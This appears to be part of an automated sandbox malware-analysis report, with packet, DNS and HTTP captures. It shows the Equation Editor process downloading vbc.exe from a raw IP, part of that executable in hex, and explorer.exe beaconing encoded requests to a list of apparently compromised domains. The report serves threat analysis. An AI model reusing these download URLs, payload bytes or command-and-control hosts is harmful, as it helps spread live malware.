Nov 26, 2020 21:14:16.262269974 CET	80	49171	66.96.162.138	192.168.2.22
Nov 26, 2020 21:14:16.262322903 CET	80	49171	66.96.162.138	192.168.2.22
Nov 26, 2020 21:14:16.262685061 CET	49171	80	192.168.2.22	66.96.162.138
Nov 26, 2020 21:14:16.293278933 CET	49171	80	192.168.2.22	66.96.162.138
Nov 26, 2020 21:14:16.391669989 CET	80	49171	66.96.162.138	192.168.2.22
Nov 26, 2020 21:14:21.394820929 CET	49172	80	192.168.2.22	85.10.195.227
Nov 26, 2020 21:14:21.415649891 CET	80	49172	85.10.195.227	192.168.2.22
Nov 26, 2020 21:14:21.415755987 CET	49172	80	192.168.2.22	85.10.195.227
Nov 26, 2020 21:14:21.416049957 CET	49172	80	192.168.2.22	85.10.195.227
Nov 26, 2020 21:14:21.436909914 CET	80	49172	85.10.195.227	192.168.2.22
Nov 26, 2020 21:14:21.436963081 CET	80	49172	85.10.195.227	192.168.2.22
Nov 26, 2020 21:14:21.436990976 CET	80	49172	85.10.195.227	192.168.2.22
Nov 26, 2020 21:14:21.437016964 CET	80	49172	85.10.195.227	192.168.2.22
Nov 26, 2020 21:14:21.437206984 CET	49172	80	192.168.2.22	85.10.195.227
Nov 26, 2020 21:14:21.437316895 CET	49172	80	192.168.2.22	85.10.195.227
Nov 26, 2020 21:14:21.458100080 CET	80	49172	85.10.195.227	192.168.2.22
Nov 26, 2020 21:14:26.619400978 CET	49173	80	192.168.2.22	192.161.187.200
Nov 26, 2020 21:14:26.773777008 CET	80	49173	192.161.187.200	192.168.2.22
Nov 26, 2020 21:14:26.773873091 CET	49173	80	192.168.2.22	192.161.187.200
Nov 26, 2020 21:14:26.774002075 CET	49173	80	192.168.2.22	192.161.187.200
Nov 26, 2020 21:14:26.931180000 CET	80	49173	192.161.187.200	192.168.2.22
Nov 26, 2020 21:14:26.931380987 CET	80	49173	192.161.187.200	192.168.2.22
Nov 26, 2020 21:14:26.931411028 CET	80	49173	192.161.187.200	192.168.2.22
Nov 26, 2020 21:14:26.931652069 CET	49173	80	192.168.2.22	192.161.187.200
Nov 26, 2020 21:14:26.931788921 CET	49173	80	192.168.2.22	192.161.187.200
Nov 26, 2020 21:14:27.087183952 CET	80	49173	192.161.187.200	192.168.2.22
Nov 26, 2020 21:14:31.990626097 CET	49174	80	192.168.2.22	104.16.16.194
Nov 26, 2020 21:14:32.007016897 CET	80	49174	104.16.16.194	192.168.2.22
Nov 26, 2020 21:14:32.007123947 CET	49174	80	192.168.2.22	104.16.16.194
Nov 26, 2020 21:14:32.007437944 CET	49174	80	192.168.2.22	104.16.16.194
Nov 26, 2020 21:14:32.023721933 CET	80	49174	104.16.16.194	192.168.2.22
Nov 26, 2020 21:14:32.320785046 CET	80	49174	104.16.16.194	192.168.2.22
Nov 26, 2020 21:14:32.320821047 CET	80	49174	104.16.16.194	192.168.2.22
Nov 26, 2020 21:14:32.320846081 CET	80	49174	104.16.16.194	192.168.2.22
Nov 26, 2020 21:14:32.320995092 CET	49174	80	192.168.2.22	104.16.16.194
Nov 26, 2020 21:14:32.321099043 CET	49174	80	192.168.2.22	104.16.16.194
Nov 26, 2020 21:14:37.697191954 CET	49175	80	192.168.2.22	160.124.66.42
Nov 26, 2020 21:14:37.974785089 CET	80	49175	160.124.66.42	192.168.2.22
Nov 26, 2020 21:14:37.975038052 CET	49175	80	192.168.2.22	160.124.66.42
Nov 26, 2020 21:14:37.975326061 CET	49175	80	192.168.2.22	160.124.66.42
Nov 26, 2020 21:14:38.253623009 CET	80	49175	160.124.66.42	192.168.2.22
Nov 26, 2020 21:14:38.257570982 CET	80	49175	160.124.66.42	192.168.2.22
Nov 26, 2020 21:14:38.257616043 CET	80	49175	160.124.66.42	192.168.2.22
Nov 26, 2020 21:14:38.257913113 CET	49175	80	192.168.2.22	160.124.66.42
Nov 26, 2020 21:14:38.258040905 CET	49175	80	192.168.2.22	160.124.66.42
Nov 26, 2020 21:14:38.535976887 CET	80	49175	160.124.66.42	192.168.2.22
Nov 26, 2020 21:14:43.303101063 CET	49176	80	192.168.2.22	52.58.78.16
Nov 26, 2020 21:14:43.319852114 CET	80	49176	52.58.78.16	192.168.2.22
Nov 26, 2020 21:14:43.319943905 CET	49176	80	192.168.2.22	52.58.78.16
Nov 26, 2020 21:14:43.320058107 CET	49176	80	192.168.2.22	52.58.78.16
Nov 26, 2020 21:14:43.336702108 CET	80	49176	52.58.78.16	192.168.2.22
Nov 26, 2020 21:14:43.336735964 CET	80	49176	52.58.78.16	192.168.2.22
Nov 26, 2020 21:14:43.336764097 CET	80	49176	52.58.78.16	192.168.2.22
Nov 26, 2020 21:14:43.336884022 CET	49176	80	192.168.2.22	52.58.78.16
Nov 26, 2020 21:14:43.336930037 CET	49176	80	192.168.2.22	52.58.78.16
Nov 26, 2020 21:14:43.353544950 CET	80	49176	52.58.78.16	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2020 21:13:47.852057934 CET	52197	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:13:48.040323973 CET	53	52197	8.8.8.8	192.168.2.22
Nov 26, 2020 21:13:54.149552107 CET	53099	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:13:54.198481083 CET	53	53099	8.8.8.8	192.168.2.22
Nov 26, 2020 21:13:59.246659040 CET	52838	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:13:59.423624992 CET	53	52838	8.8.8.8	192.168.2.22
Nov 26, 2020 21:14:05.503380060 CET	61200	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:14:05.565918922 CET	53	61200	8.8.8.8	192.168.2.22
Nov 26, 2020 21:14:10.649647951 CET	49548	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:14:10.720680952 CET	53	49548	8.8.8.8	192.168.2.22
Nov 26, 2020 21:14:15.896807909 CET	55627	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:14:16.031919003 CET	53	55627	8.8.8.8	192.168.2.22
Nov 26, 2020 21:14:21.333838940 CET	56009	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:14:21.392705917 CET	53	56009	8.8.8.8	192.168.2.22
Nov 26, 2020 21:14:26.443860054 CET	61865	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:14:26.616909981 CET	53	61865	8.8.8.8	192.168.2.22
Nov 26, 2020 21:14:31.935447931 CET	55171	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:14:31.988279104 CET	53	55171	8.8.8.8	192.168.2.22
Nov 26, 2020 21:14:37.356272936 CET	52496	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:14:37.695303917 CET	53	52496	8.8.8.8	192.168.2.22
Nov 26, 2020 21:14:43.253629923 CET	57564	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:14:43.302651882 CET	53	57564	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 26, 2020 21:13:47.852057934 CET	192.168.2.22	8.8.8.8	0x305	Standard query (0)	www.nziyade.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:13:54.149552107 CET	192.168.2.22	8.8.8.8	0x708c	Standard query (0)	www.coloringprintouts.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:13:59.246659040 CET	192.168.2.22	8.8.8.8	0xa14d	Standard query (0)	www.ktproductreviews.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:05.503380060 CET	192.168.2.22	8.8.8.8	0x2e78	Standard query (0)	www.mondzorg-postma.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:10.649647951 CET	192.168.2.22	8.8.8.8	0x2f03	Standard query (0)	www.cocogreensoil.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:15.896807909 CET	192.168.2.22	8.8.8.8	0x3c4e	Standard query (0)	www.moveoneic.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:21.333838940 CET	192.168.2.22	8.8.8.8	0x6ec7	Standard query (0)	www.antillean-network.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:26.443860054 CET	192.168.2.22	8.8.8.8	0xa84f	Standard query (0)	www.integratednourishment.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:31.935447931 CET	192.168.2.22	8.8.8.8	0x4b92	Standard query (0)	www.gregoryrecommends.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:37.356272936 CET	192.168.2.22	8.8.8.8	0x4b93	Standard query (0)	www.yanasacha.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:43.253629923 CET	192.168.2.22	8.8.8.8	0xc2d7	Standard query (0)	www.bigdillenergy.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 26, 2020 21:13:48.040323973 CET	8.8.8.8	192.168.2.22	0x305	No error (0)	www.nziyade.com	nziyade.com		CNAME (Canonical name)	IN (0x0001)
Nov 26, 2020 21:13:48.040323973 CET	8.8.8.8	192.168.2.22	0x305	No error (0)	nziyade.com		92.42.39.29	A (IP address)	IN (0x0001)
Nov 26, 2020 21:13:54.198481083 CET	8.8.8.8	192.168.2.22	0x708c	No error (0)	www.coloringprintouts.com		52.58.78.16	A (IP address)	IN (0x0001)
Nov 26, 2020 21:13:59.423624992 CET	8.8.8.8	192.168.2.22	0xa14d	No error (0)	www.ktproductreviews.com	ktproductreviews.com		CNAME (Canonical name)	IN (0x0001)
Nov 26, 2020 21:13:59.423624992 CET	8.8.8.8	192.168.2.22	0xa14d	No error (0)	ktproductreviews.com		66.235.200.146	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:05.565918922 CET	8.8.8.8	192.168.2.22	0x2e78	No error (0)	www.mondzorg-postma.com		188.93.150.44	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:10.720680952 CET	8.8.8.8	192.168.2.22	0x2f03	No error (0)	www.cocogreensoil.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Nov 26, 2020 21:14:10.720680952 CET	8.8.8.8	192.168.2.22	0x2f03	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:16.031919003 CET	8.8.8.8	192.168.2.22	0x3c4e	No error (0)	www.moveoneic.com		66.96.162.138	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:21.392705917 CET	8.8.8.8	192.168.2.22	0x6ec7	No error (0)	www.antillean-network.com	antillean-network.com		CNAME (Canonical name)	IN (0x0001)
Nov 26, 2020 21:14:21.392705917 CET	8.8.8.8	192.168.2.22	0x6ec7	No error (0)	antillean-network.com		85.10.195.227	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:26.616909981 CET	8.8.8.8	192.168.2.22	0xa84f	No error (0)	www.integratednourishment.com	parking.namesilo.com		CNAME (Canonical name)	IN (0x0001)
Nov 26, 2020 21:14:26.616909981 CET	8.8.8.8	192.168.2.22	0xa84f	No error (0)	parking.namesilo.com		192.161.187.200	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:26.616909981 CET	8.8.8.8	192.168.2.22	0xa84f	No error (0)	parking.namesilo.com		198.251.81.30	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:26.616909981 CET	8.8.8.8	192.168.2.22	0xa84f	No error (0)	parking.namesilo.com		204.188.203.155	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:26.616909981 CET	8.8.8.8	192.168.2.22	0xa84f	No error (0)	parking.namesilo.com		209.141.38.71	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:26.616909981 CET	8.8.8.8	192.168.2.22	0xa84f	No error (0)	parking.namesilo.com		198.251.84.92	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:26.616909981 CET	8.8.8.8	192.168.2.22	0xa84f	No error (0)	parking.namesilo.com		70.39.125.244	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:26.616909981 CET	8.8.8.8	192.168.2.22	0xa84f	No error (0)	parking.namesilo.com		45.58.190.82	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:26.616909981 CET	8.8.8.8	192.168.2.22	0xa84f	No error (0)	parking.namesilo.com		188.164.131.200	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:26.616909981 CET	8.8.8.8	192.168.2.22	0xa84f	No error (0)	parking.namesilo.com		107.161.23.204	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:26.616909981 CET	8.8.8.8	192.168.2.22	0xa84f	No error (0)	parking.namesilo.com		64.32.22.102	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:26.616909981 CET	8.8.8.8	192.168.2.22	0xa84f	No error (0)	parking.namesilo.com		168.235.88.209	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:31.988279104 CET	8.8.8.8	192.168.2.22	0x4b92	No error (0)	www.gregoryrecommends.com	target.clickfunnels.com		CNAME (Canonical name)	IN (0x0001)
Nov 26, 2020 21:14:31.988279104 CET	8.8.8.8	192.168.2.22	0x4b92	No error (0)	target.clickfunnels.com		104.16.16.194	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:31.988279104 CET	8.8.8.8	192.168.2.22	0x4b92	No error (0)	target.clickfunnels.com		104.16.15.194	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:31.988279104 CET	8.8.8.8	192.168.2.22	0x4b92	No error (0)	target.clickfunnels.com		104.16.12.194	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:31.988279104 CET	8.8.8.8	192.168.2.22	0x4b92	No error (0)	target.clickfunnels.com		104.16.14.194	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:31.988279104 CET	8.8.8.8	192.168.2.22	0x4b92	No error (0)	target.clickfunnels.com		104.16.13.194	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:37.695303917 CET	8.8.8.8	192.168.2.22	0x4b93	No error (0)	www.yanasacha.com		160.124.66.42	A (IP address)	IN (0x0001)
Nov 26, 2020 21:14:43.302651882 CET	8.8.8.8	192.168.2.22	0xc2d7	No error (0)	www.bigdillenergy.com		52.58.78.16	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

216.170.126.121

www.nziyade.com

www.coloringprintouts.com

www.ktproductreviews.com

www.mondzorg-postma.com

www.cocogreensoil.com

www.moveoneic.com

www.antillean-network.com

www.integratednourishment.com

www.gregoryrecommends.com

www.yanasacha.com

www.bigdillenergy.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	216.170.126.121	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:13:00.238950968 CET	0	OUT	GET /hkcmd/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 216.170.126.121 Connection: Keep-Alive
Nov 26, 2020 21:13:00.358699083 CET	1	IN	HTTP/1.1 200 OK Date: Thu, 26 Nov 2020 20:13:00 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34 Last-Modified: Thu, 26 Nov 2020 08:44:44 GMT ETag: "74e00-5b4fe8e3ad860" Accept-Ranges: bytes Content-Length: 478720 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fc 6a bf 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 44 07 00 00 08 00 00 00 00 00 00 8e 62 07 00 00 20 00 00 00 80 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 62 07 00 4f 00 00 00 00 80 07 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 42 07 00 00 20 00 00 00 44 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 05 00 00 00 80 07 00 00 06 00 00 00 46 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 07 00 00 02 00 00 00 4c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 62 07 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 72 00 00 9c 63 00 00 03 00 00 00 78 00 00 06 4c d6 00 00 f0 8b 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 47 00 00 00 01 00 00 11 02 14 7d 03 00 00 04 02 28 15 00 00 0a 00 00 02 28 06 00 00 06 00 02 73 1d 00 00 06 7d 01 00 00 04 02 7b 01 00 00 04 02 6f 18 00 00 06 00 28 16 00 00 0a 0a 02 7b 01 00 00 04 02 7b 02 00 00 04 6f 1c 00 00 06 00 2a 00 13 30 02 00 c8 00 00 00 02 00 00 11 00 28 17 00 00 0a 02 7b 01 00 00 04 7b 0e 00 00 04 28 18 00 00 0a 0a 12 00 28 19 00 00 0a 7e 10 00 00 04 76 6c fe 02 0b 07 2c 11 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1a 00 00 0a 00 02 7b 01 00 00 04 7b 0f 00 00 04 04 6f 1b 00 00 0a 6f 1c 00 00 0a 00 02 7b 01 00 00 04 28 17 00 00 0a 7d 0e 00 00 04 04 6f 1b 00 00 0a 1f 0d 33 15 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1d 00 00 0a 16 fe 02 2b 01 16 0c 08 2c 40 00 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1e 00 00 0a 73 1f 00 00 0a 0d 02 7b 01 00 00 04 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1b 00 00 06 00 02 7b 01 00 00 04 7b 0f 00 00 04 6f 1a 00 00 0a 00 00 2a 92 00 02 7b 04 00 00 04 28 20 00 00 0a 6f 21 00 00 0a 00 02 7b 04 00 00 04 7e 11 00 00 04 6f 22 00 00 0a 00 2a 92 00 02 7b 04 00 00 04 28 23 00 00 0a 6f 21 00 00 0a 00 02 7b 04 00 00 04 7e 12 00 00 04 6f 22 00 00 0a 00 2a 00 00 13 30 02 00 2b 00 00 00 03 00 00 11 00 03 2c 0b 02 7b 03 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 03 00 00 04 6f 24 00 00 0a Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELj_0Db @ @<bO H.textB D `.rsrcF@@.relocL@BpbHrcxL0G}((s}{o({{o0({{((~vl,{{o{{oo{(}o3{{o+,@{{os{{{o{{o{( o!{~o"{(#o!{~o"0+,{+,{o$
Nov 26, 2020 21:13:00.358763933 CET	3	IN	Data Raw: 00 00 02 03 28 25 00 00 0a 00 2a 00 13 30 06 00 03 03 00 00 00 00 00 00 00 02 73 26 00 00 0a 7d 04 00 00 04 02 73 27 00 00 0a 7d 05 00 00 04 02 7b 05 00 00 04 6f 28 00 00 0a 00 02 28 28 00 00 0a 00 02 7b 04 00 00 04 17 6f 29 00 00 0a 00 02 7b 04 Data Ascii: (%0s&}s'}{o((({o){o{rp"A s+o,{ s-o.{rpo/{ ss0o1{o2{r'po"{ o3{
Nov 26, 2020 21:13:00.358804941 CET	4	IN	Data Raw: 0c 00 00 04 28 20 00 00 0a 6f 21 00 00 0a 00 00 02 7b 0c 00 00 04 03 6f 22 00 00 0a 00 2a 13 30 02 00 3c 00 00 00 03 00 00 11 00 04 0a 06 2c 15 00 02 7b 0d 00 00 04 28 23 00 00 0a 6f 21 00 00 0a 00 00 2b 13 00 02 7b 0d 00 00 04 28 20 00 00 0a 6f Data Ascii: ( o!{o"0<,{(#o!+{( o!{o"0+,{+,{o$(%*0Gs&}s&}s&}sZ}{o((({r
Nov 26, 2020 21:13:00.358915091 CET	6	IN	Data Raw: 28 26 00 00 06 00 00 2a 13 30 02 00 60 00 00 00 03 00 00 11 02 28 6f 00 00 0a 00 00 03 28 6e 00 00 0a 28 70 00 00 0a 2c 0d 04 28 6e 00 00 0a 28 70 00 00 0a 2b 01 16 0a 06 2c 1a 00 02 7e 20 00 00 04 7d 1d 00 00 04 02 7e 21 00 00 04 7d 1e 00 00 04 Data Ascii: (&0`(o(n(p,(n(p+,~ }~!}+}}}('0HoqZ(s0(rrNp"As+o,(s(tou*0ov(w(x(y{
Nov 26, 2020 21:13:00.477036953 CET	7	IN	Data Raw: 00 0a 00 02 7b 2a 00 00 04 02 28 77 00 00 0a 1f 28 73 30 00 00 0a 6f 31 00 00 0a 00 02 7b 2a 00 00 04 72 c0 03 00 70 6f 22 00 00 0a 00 02 7b 2a 00 00 04 02 fe 06 36 00 00 06 73 48 00 00 0a 6f 90 00 00 0a 00 02 28 42 00 00 0a 02 7b 2b 00 00 04 6f Data Ascii: {(w(s0o1{rpo"{6sHo(B{+oC(B{oC"(Vrp-rp.0]rp(rp((n(0}5rpo" (0(o(:
Nov 26, 2020 21:13:00.477102041 CET	8	IN	Data Raw: 78 00 00 0a 1f 28 59 73 2d 00 00 0a 6f 2e 00 00 0a 00 02 7b 3b 00 00 04 02 28 77 00 00 0a 18 5b 1f 28 73 30 00 00 0a 6f 31 00 00 0a 00 02 7b 3b 00 00 04 72 02 04 00 70 6f 22 00 00 0a 00 02 7b 3b 00 00 04 02 fe 06 42 00 00 06 73 48 00 00 0a 6f 90 Data Ascii: x(Ys-o.{;(w[(s0o1{;rpo"{;BsHo(B{<oC(B{=oC(B{:oC(B{;oC0(&{?+j{=o}?(B}?(&(O
Nov 26, 2020 21:13:00.477142096 CET	10	IN	Data Raw: 7b 45 00 00 04 17 16 6f 39 00 00 0a 00 02 7b 43 00 00 04 6f 38 00 00 0a 02 7b 46 00 00 04 17 17 6f 39 00 00 0a 00 02 7b 43 00 00 04 6f 38 00 00 0a 02 7b 47 00 00 04 17 18 6f 39 00 00 0a 00 02 7b 43 00 00 04 6f 38 00 00 0a 02 7b 48 00 00 04 17 19 Data Ascii: {Eo9{Co8{Fo9{Co8{Go9{Co8{Ho9{Co8{Io9{Co8{Jo9{Co*{Cs-o.{Crpo/{Co:{Co;" As<o=&{Co;"
Nov 26, 2020 21:13:00.477180004 CET	11	IN	Data Raw: 02 7b 4a 00 00 04 1f 18 6f 32 00 00 0a 00 02 7b 4a 00 00 04 72 de 06 00 70 6f 22 00 00 0a 00 02 7b 44 00 00 04 1b 6f 2a 00 00 0a 00 02 7b 44 00 00 04 06 72 e6 06 00 70 6f b4 00 00 0a 74 76 00 00 01 6f b5 00 00 0a 00 02 7b 44 00 00 04 19 19 73 2d Data Ascii: {Jo2{Jrpo"{Do*{Drpotvo{Ds-o.{Drpo/{C{Do{D s0o1{Do{Do{Do{J("@"PAs>(?(@
Nov 26, 2020 21:13:00.477229118 CET	13	IN	Data Raw: 96 07 00 70 6f c4 00 00 0a a2 28 ce 00 00 0a 0d 07 09 6f cf 00 00 0a 00 00 08 17 58 0c 08 03 6f c6 00 00 0a fe 04 13 04 11 04 3a 31 ff ff ff 00 de 0b 07 2c 07 07 6f 24 00 00 0a 00 dc 2a 01 10 00 00 02 00 0e 00 da e8 00 0b 00 00 00 00 13 30 03 00 Data Ascii: po(oXo:1,o$0\s{Qo^,?{Qo_r:poo,rLpoo+,++0;\|sbo^,o,
Nov 26, 2020 21:13:00.477334023 CET	14	IN	Data Raw: 00 04 1f 4b 1f 17 73 30 00 00 0a 6f 31 00 00 0a 00 02 7b 59 00 00 04 1c 6f 32 00 00 0a 00 02 7b 59 00 00 04 72 d4 08 00 70 6f 22 00 00 0a 00 02 7b 59 00 00 04 17 6f d6 00 00 0a 00 02 7b 59 00 00 04 02 fe 06 69 00 00 06 73 48 00 00 0a 6f 90 00 00 Data Ascii: Ks0o1{Yo2{Yrpo"{Yo{YisHo{W("@"PAs>(?(@ s0(A(B{YoC(B{XoC(B{WoC(B{VoC(B{UoC(B
Nov 26, 2020 21:13:00.477379084 CET	15	IN	Data Raw: 6f 2f 00 00 0a 00 02 7b 5b 00 00 04 1f 4b 1f 17 73 30 00 00 0a 6f 31 00 00 0a 00 02 7b 5b 00 00 04 16 6f 32 00 00 0a 00 02 7b 5b 00 00 04 72 02 04 00 70 6f 22 00 00 0a 00 02 7b 5b 00 00 04 17 6f d6 00 00 0a 00 02 7b 5b 00 00 04 02 fe 06 72 00 00 Data Ascii: o/{[Ks0o1{[o2{[rpo"{[o{[rsHo{\ s-o.{\rpo/{\ys0o1{\o2{] @s-o.{]rpo/{]ys0o1{]o2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	92.42.39.29	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:13:48.109751940 CET	507	OUT	GET /sqe3/?cB=b5w1+wtMG086+ku5rySlnuvQ6Xf8quQxjwBGS8AB8cD8tokaT2Rnkch2TwRAgrEjQEkeCg==&NreT=XJE0G4nHflj HTTP/1.1 Host: www.nziyade.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 26, 2020 21:13:49.526554108 CET	509	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache, must-revalidate, max-age=0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Server: Microsoft-IIS/8.5 Link: <https://www.nziyade.com/wp-json/>; rel="https://api.w.org/" X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Thu, 26 Nov 2020 20:13:34 GMT Connection: close Content-Length: 55925 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0d 0a 0d 0a 09 09 09 09 0d 0a 09 09 09 3c 74 69 74 6c 65 3e 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 26 23 38 32 31 31 3b 20 5a 69 79 61 64 65 20 50 69 64 65 20 26 61 6d 70 3b 20 4b 65 62 61 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 5a 69 79 61 64 65 20 50 69 64 65 20 26 61 6d 70 3b 20 4b 65 62 61 70 20 26 72 61 71 75 6f 3b 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 7a 69 79 61 64 65 2e 63 6f 6d 2f 66 65 65 64 2f 